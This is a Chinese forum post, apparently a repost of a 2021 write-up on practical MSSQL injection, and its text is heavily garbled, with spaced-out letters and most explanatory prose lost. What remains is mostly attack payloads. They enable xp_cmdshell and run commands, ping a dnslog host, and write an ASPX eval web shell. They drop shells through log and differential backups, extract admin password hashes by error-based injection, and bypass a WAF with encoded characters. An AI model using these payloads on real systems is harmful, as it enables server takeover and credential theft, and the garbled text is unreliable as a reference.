[7616] 2021-06-11_经验分享mssql注入实战总结之狠快准绕

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-17
2021-06-11_经验分享mssql注入实战总结之狠快准绕   |   m s s q l   C h a l l e n g e r   F 1 2 s e c   2 0 2 1 - 0 6 - 1 1 s q l m a p                                                                       - c t f . s h o w 4 : g e t s h e l l 1 0 0 4 F 1 2 s e c C h a l l e n g e r O A s q l s a e d u x p _ c m d s h e l l . . x p _ c m d s h e l l x p _ c m d s h e l l s h e l l : s a x p _ c m d s h e l l   S Q L   S e r v e r   2 0 0 5
#           e x e c u t e ( s p _ c o n f i g u r e   s h o w   a d v a n c e d   o p t i o n s , 1 )     # 1           e x e c u t e ( r e c o n f i g u r e )                                                           #           e x e c u t e ( s p _ c o n f i g u r e   x p _ c m d s h e l l ,   1 )                       # x p _ c m d s h e l l 1           e x e c u t e ( r e c o n f i g u r e )                                                           #           e x e c u t e ( s p _ c o n f i g u r e )                                                         #           e x e c u t e ( x p _ c m d s h e l l   w h o a m i )                                         #           e x e c   s p _ c o n f i g u r e   s h o w   a d v a n c e d   o p t i o n s , 1 ;                       r e c o n f i g u r e ;                                                                                       e x e c   s p _ c o n f i g u r e   x p _ c m d s h e l l , 1 ;                                             r e c o n f i g u r e ;                                                                                     e x e c   s p _ c o n f i g u r e ;                                                                           e x e c   x p _ c m d s h e l l   w h o a m i ;               e x e c   m a s t e r   . . x p _ c m d s h e l l   p i n g   d n s l o g     w h o a m i           s y s t e m     s h e l l : # a s p x 访 t a r i s p r i n g b o o t .         访 e x e c   x p _ c m d s h e l l   w h e r e   / r   d :   * . a s p x ;
s h e l l d o s < > ^ e c h o   " "   >   h a c k . a s p x     ( ) h t t p : / / x . x . x . x / l o g i n / l o g i n / x x . a s p x . g e t h e l l : x p _ c m d s h e l l , g e t s h e l l ( ) , . S Q L   S e r v e r   2 0 0 8 S Q L   S e r v e r   2 0 0 0 S Q L   S e r v e r   2 0 0 8 ~ ~ g e t s h e l l g e t s h e l l : ( D B O ) l o g ( ) : 1 2 s h e l l 1 2 3 e x e c   x p _ c m d s h e l l   w h e r e   / r   D : O A   * . j p g ;   e c h o   ^ < ^ % @   P a g e   L a n g u a g e = J s c r i p t % ^ > ^ < ^ % e v a l ( R e q u e s t . I t e m [ y ] , u n s a f e ) ; % ^ > ^   > d : x x x x . a s p x
: 1 2 H T T P   5 0 0 3 W E B % 4 g e t s h e l l p h p a s p , a s p a s p x a s p x 2 s h e l l < % @   P a g e   L a n g u a g e = x x     % > : p a g e       m s s q l 便 4           0 0 x x x x x       1 2 3 4 5 6 ; a l t e r   d a t a b a s e     s e t   R E C O V E R Y   F U L L - -     ; c r e a t e   t a b l e   . . ( a   i m a g e ) - -           / / ; i n s e r t   i n t o   . . ( a )   v a l u e s   ( 0 x ) - -           / / 1 6   ; b a c k u p   d a t a b a s e     t o   d i s k   =   ' c : w w w p a n d a . b a k ' - -                     / /   ; b a c k u p   l o g     t o   d i s k   =   ' c : w w w p a n d a . a s p '   w i t h   i n i t - -   / / l o g w e b g e t s h e l l ; b a c k u p   d a t a b a s e     t o   d i s k   =   c : b a k . b a k   ; -         / / ; c r e a t e   t a b l e   . . ( a   i m a g e ) -           / / ; i n s e r t   i n t o   . . ( a )   v a l u e s   ( 0 x ) -           / / 1 6 ; b a c k u p   d a t a b a s e     t o   d i s k   =   c : s h e l l . a s p   w i t h   d i f f e r e n t i a l   ,   f o r m a t   ; - -   / /
s q l / / # s a # c m d s h e l l #   1 .   : # 2 . # 3 . # 4 .         # u s e r n a m e         # a d m i n p a s s w o r d m s s q l s q l ,     s q l U s e r s / x x . a s h x ? I D = 0 0 ' )   a n d   1 = 1   - - + ' )   a n d   1 = c o n v e r t ( i n t , u s e r _ n a m e ( ) )   - - +   1 ' ) / * * / ; / * * / e x e c / * * / m a s t e r   . . x p _ c m d s h e l l   / * * /   " p i n g     x x . d n s l o g . c n "   - - + ' )   a n d   1 = c o n v e r t ( i n t , s t u f f ( ( s e l e c t   q u o t e n a m e ( n a m e )   f r o m   s y s . d a t a b a s e s   f o r   x m l   p a t h ( ' ' ) ) , 1 , 0 , ' ' ) ) - - + ' )   a n d   1 = c o n v e r t ( i n t , s t u f f ( ( s e l e c t     q u o t e n a m e ( n a m e )   f r o m   . s y s . o b j e c t s   w h e r e   t y p e = ' U '   f o r   x m l   p a t h ( ' ' ) ) , 1 , 0 , ' ' ) ) - - + ' )   a n d   1 = c o n v e r t ( i n t , s t u f f ( ( s e l e c t   q u o t e n a m e ( n a m e )   f r o m   . s y s . c o l u m n s   w h e r e   o b j e c t _ i d = o b j e c t _ i d ( ' ' )   f o r   x m l   p a t h ( ' ' ) ) , 1 , 0 , ' ' ) ) - - + ' )   a n d   1 = c o n v e r t ( i n t , s t u f f ( ( s e l e c t   q u o t e n a m e ( U S N M )   f r o m       f o r   x m l   p a t h ( ' ' ) ) , 1 , 0 , ' ' ) ) - - + ' )   a n d   1 = c o n v e r t ( i n t , s t u f f ( ( s e l e c t   q u o t e n a m e ( P S W D )   f r o m   T _ U S E R   w h e r e   U S N M = ' a d m i n '   f o r   x m l   p a t h ( ' ' ) ) , 1 , 0 , ' ' ) ) - - +
. .   1 / * * / a n d / * * / 1 = 1 - - +         # 1 . s a ) # m s s q l x p _ c m d s h e l l # # 1 ' / * * / a n d / * * / 1 = c o n v e r t ( i n t , u s e r _ n a m e ( ) )   - - + 1 ' / * * / ; / * * / e x e c / * * / m a s t e r   . . x p _ c m d s h e l l   / * * / " p i n g   x x . d n s l o g . c n " + 1 ' / * * / a n d / * * / 1 = c o n v e r t ( i n t , s t u f f ( ( s e l e c t   q u o t e n a m e ( n a m e )   f r o m   s y s . d a t a b a s e s   f o r   x m l   p a t h ( ' ' ) ) , 1 , 0 , ' ' ) ) - - + 1 ' / * * / a n d / * * / 1 = c o n v e r t ( i n t , s t u f f ( ( s e l e c t     q u o t e n a m e ( n a m e )   f r o m   . s y s . o b j e c t s   w h e r e   t y p e = U   f o r   x m l   p a t h ( ' ' ) ) , 1 , 0 , ' ' ) ) - - +
p a y l o a d n 1 1 1 1 1 1 1 1 1 1 1 1 . .     1 0 0 T M c t f     1 0 0     #   U s e r s   n i d     s q l 使   U s e r s . n i d         # U s e r s . s y s u s e r I d 使 使 2       # . . U s e r s . U s e r P w d     U s e r s . U s e r N a m e     1 0 0 e m m m   # t e s t , m d 5 '   h a v i n g   1 = 1 - - +     '   g r o u p   b y   U s e r s . n i d   h a v i n g   1 = 1 - - '   g r o u p   b y   U s e r s . n i d , U s e r s . s y s u s e r I d   h a v i n g   1 = 1 - - '   g r o u p   b y   U s e r s . n i d , U s e r s . s y s u s e r I d , U s e r s . R o l e I d , U s e r s . R o l e T y p e , U s e r s . U s e r N a m e   h a v i n g   1 = 1 - - 1 '   a n d   1 = ( s e l e c t   t o p   1   U s e r N a m e   f r o m   U s e r s )   - - 1 '   a n d   1 = ( s e l e c t   t o p   1   U s e r P w d   f r o m   U s e r s )   - -
, t e s t 1 #   # t e s t 1 t e s t a d m i n M D 5 F e n g X o n e s q l F e n g X o n e w a f 1 '   a n d   1 = ( s e l e c t   t o p   1   U s e r N a m e   f r o m   U s e r s   w h e r e   U s e r N a m e ! = ' t e s t ' ) - -   1 '   a n d   1 = ( s e l e c t   t o p   1   U s e r P w d   f r o m   U s e r s   w h e r e   U s e r N a m e = ' t e s t 1 ' ) - - 1 '   a n d   1 = ( s e l e c t   t o p   1   U s e r P w d   f r o m   U s e r s   w h e r e   U s e r N a m e = ' a d m i n ' ) - -
s q l f u z z   p a y l o a d : x x x             s r c . . f u z z p a y l o a d   6 6 6       |   B y p a s s   W A F     H T T P H T T P S       |     B Y P A S S - ~ I D = 1 % 1 e o r % 1 e 1 % 3 d d b _ n a m e   ( ) % 1 e - - I D = 1 % 2 0 o r % 2 0 1 = 1 - -
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则